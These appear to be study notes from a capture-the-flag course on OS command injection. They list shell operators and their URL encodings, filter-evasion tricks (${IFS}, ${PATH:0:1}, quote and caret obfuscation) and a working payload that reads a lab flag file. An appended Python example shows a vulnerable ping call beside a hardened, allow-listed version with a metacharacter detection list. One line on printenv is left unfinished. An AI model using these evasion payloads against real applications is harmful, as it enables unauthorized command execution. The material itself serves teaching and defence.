Command Injection
Exploitation - Detection
Detection follows the same methodology as actual exploitation: inject one of the operators below and check whether the injected command's output comes back.
| Operator | Injection | URL Encoded | Command executed |
|---|---|---|---|
| Semicolon | ; | %3b | Both |
| New Line | \n | %0a | Both |
| Background | & | %26 | Both (second output shown first) |
| Pipe | \| | %7c | Both (only second output is shown) |
| AND | && | %26%26 | Both, but only if the first command succeeds |
| OR | \|\| | %7c%7c | Second, but only if the first command fails |
| Sub-Shell | \`\` | %60%60 | Both (Linux only) |
| Sub-Shell | $() | %24%28%29 | Both (Linux only) |
Exploitation - Injecting Commands
Frontend validation alone does not protect against command injection; the backend must validate the parameter as well, because the frontend check is bypassed by sending the request directly.
Filter Evasion - Identifying Filters
If the error comes back in the page's normal output area, the filter is probably in the backend code. If it comes back as a separate page, often including your IP address, it is probably a WAF.
Filter Evasion - Bypassing Space Filters
Note: a literal `\n` and its URL-encoded form (`%0a`) are not the same thing.
- Tabs can replace spaces: `%09` is the URL encoding of a tab.
- `${IFS}` is a Linux environment variable (the Internal Field Separator) whose default value contains a space.
- Brace expansion, e.g. `{ls,-la}`, inserts a space between the elements.
Useful link: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#bypass-without-space
Filter Evasion - Bypassing Other Blacklisted Characters
`\` and `/` are commonly filtered out.
Replacing blacklisted characters with Linux variables is a good alternative. Slashes do not have a variable of their own, but we can get one from the `${PATH}` variable by using substring expansion (`${VAR:offset:length}`) to pick out the character we want.
Example:
`echo ${PATH}`
`/usr/local/bin:/usr/bin:/bin:/usr/games`
To get the root directory character we can do the following:
`echo ${PATH:0:1}`
This outputs `/`, the root directory.
`${LS_COLORS:10:1}`
This is a way to extract a semicolon. Based on the output, I am guessing it counts by characters: `LS_COLORS` starts with `rs=0:di=01;`, so the semicolon is at position 10 (remember 0 is the first position), and the trailing `1` extracts only one character from there.
`printenv`
is a Linux command that
NOTE: Always test the payload in a terminal first. You may not be able to echo anything out of the target, so work out the path you need on a Linux environment first, then alter the injection to produce what you want.
Example injection:
`ip=127.0.0.1%0als${IFS}${PATH:0:1}home`
Filter Evasion - Bypassing Blacklisted Commands
A common way of obfuscating a command is to insert characters that Linux or Windows generally ignores.
We can use quotes:
`e'c'h'o'`
`e"c"h"o"`
Linux only: backslashes and `$@`, which is called the positional parameters character.
`e\c\h\o`
`ec$@cho`
Windows only: `^`
`C:\htb> who^ami`
Injection to get the flag:
`127.0.0.1%0ac"at"${IFS}${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt`
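As an added example that is not part of these notes, here is what the backend-side check the notes call for looks like in Python for the `ip` parameter used in the injections above: it URL-decodes the value as the server sees it, allow-lists it as a single IP address, and reports which of the table's operators (plus the `${IFS}`, `${PATH:0:1}` and quote tricks) a decoded value contains, the kind of rule a WAF or log detection would apply. The ping utility, its `-c 1` arguments and the function names are assumptions, not the target application's own code.

```python
import ipaddress
import subprocess
from urllib.parse import unquote

# Shell metacharacters from the operator table, plus the characters the notes
# use to dodge space/slash/command filters: $ { } (for ${IFS}, ${PATH:0:1}),
# tab (%09), backslash and quotes (e\c\h\o, e"c"h"o").
METACHARS = ";\n&|`$(){}\\\t'\""


def decode_param(raw: str) -> str:
    """URL-decode a query-string value once, exactly as the backend receives it."""
    return unquote(raw)


def is_safe_ip(value: str) -> bool:
    """Allow-list check: the decoded value must parse as one IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def find_operators(value: str) -> list[str]:
    """Detection helper: which injection metacharacters a decoded value contains."""
    return sorted({ch for ch in value if ch in METACHARS})


def ping_vulnerable(ip: str) -> str:
    """Vulnerable pattern (assumed app): the parameter is interpolated into a
    shell command line, so every operator in the table is parsed by the shell."""
    result = subprocess.run(f"ping -c 1 {ip}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def ping_hardened(ip: str) -> str:
    """Hardened pattern: validate first, then pass an argv list with shell=False
    so no shell ever parses the value."""
    if not is_safe_ip(ip):
        raise ValueError("rejected: parameter is not a single IP address")
    result = subprocess.run(["ping", "-c", "1", ip],
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs: one legitimate value and the first payload from the notes.
    for raw in ("127.0.0.1", "127.0.0.1%0als${IFS}${PATH:0:1}home"):
        decoded = decode_param(raw)
        print(repr(decoded), is_safe_ip(decoded), find_operators(decoded))
```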